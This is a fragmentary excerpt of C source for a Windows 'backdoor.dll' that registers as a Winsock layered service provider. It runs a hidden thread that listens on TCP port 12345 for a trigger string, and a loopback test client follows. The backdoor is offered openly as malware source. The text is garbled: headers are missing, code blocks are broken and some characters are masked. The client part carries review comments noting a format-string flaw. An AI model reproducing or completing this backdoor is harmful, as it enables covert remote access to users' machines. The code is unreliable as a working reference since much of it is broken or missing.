/n");
printf("date: 11-3-2002/n/n");
return ;
}void usage()
2.backdoor.dll的源**
#pragma data_seg("shared")
int dllcount=0;
#pragma data_seg()
#pragma ***ment (linker,"/section:shared,rws")
#define unicode
#define _unicode
#include
#include
#include
guid filterguid=};
lpwsaprotocol_infow protoinfo=null;
wspproc_table nextproctable;
dword protoinfosize=0;
handle hmutex;
handle hthread;
point nowpt;
int totalprotos=0;
dword winapi backdoor(lpvoid)
if((sock=socket(af_i***,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=htons(inaddr_any);
sin.sin_family=af_i***;
sin.sin_port=htons(12345);
if(bind(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
if(listen(sock,5)==socket_error)
while(1)
if((iret==recv(sockt,msg,sizeof(msg),0))==socket_error)
if(strstr(msg,"i am too2y"))
}outputdebugstring(_t("transport successfully"));
closesocket(sockt);
}return 1;
}bool getfilter()
}if((protoinfo=(lpwsaprotocol_infow)globalalloc(gptr,protoinfosize))==null)
if((totalprotos=wscenumprotocols(null,protoinfo,&protoinfosize,&errorcode))==socket_error)
return true;
}void freefilter()
bool winapi dllmain(hinstance hmodule,
dword reason,
lpvoid lpreserved)
releasemutex(hmutex);
break;
}case dll_process_detach:
releasemutex(hmutex);
closehandle(hthread);
break;}}
return true;
}int wspapi wspstartup(
word wversionrequested,
lpwspdata lpwspdata,
lpwsaprotocol_infow lpprotoinfo,
wspupcalltable upcalltable,
lpwspproc_table lpproctable)
getfilter();
for(i=0;iprotocolchain.chainlen;i++)
}filterpathlen=max_path;
filterpath=(tchar*)globalalloc(gptr,filterpathlen);
for(i=0;i
#include
#include
/*
 * Loopback test client for the listener above: connects to 127.0.0.1:12345,
 * sends the contents of msg, prints whatever comes back, then exits.
 * The declarations of sock, sin, msg and iret, the opening brace, and the
 * bodies of the error branches are not present in this excerpt; the
 * if-conditions below are shown without their handlers.
 */
int main()
if((sock=socket(af_i***,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=i***_addr("127.0.0.1");
sin.sin_family=af_i***;
sin.sin_port=htons(12345);
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
/* Sends the whole buffer (sizeof(msg)), not just the string in it. */
if((iret=send(sock,msg,sizeof(msg),0))==socket_error)
/*
 * Buffer is zeroed, then up to sizeof(msg) bytes are read into it. A reply
 * that fills the buffer completely leaves no NUL terminator for printf.
 */
memset(msg,0,sizeof(msg));
if((iret=recv(sock,msg,sizeof(msg),0))==socket_error)
printf("re: ");
/*
 * NOTE(review): non-literal format string. msg holds bytes received from
 * the peer, so any '%' directives in the reply are interpreted by printf
 * (CERT FIO30-C). The safe form is printf("%s", msg) or fputs(msg, stdout).
 */
printf(msg);
closesocket(sock);
wsacleanup();
/* Wait for a keypress so the console output stays visible. */
getche();
return 0;
}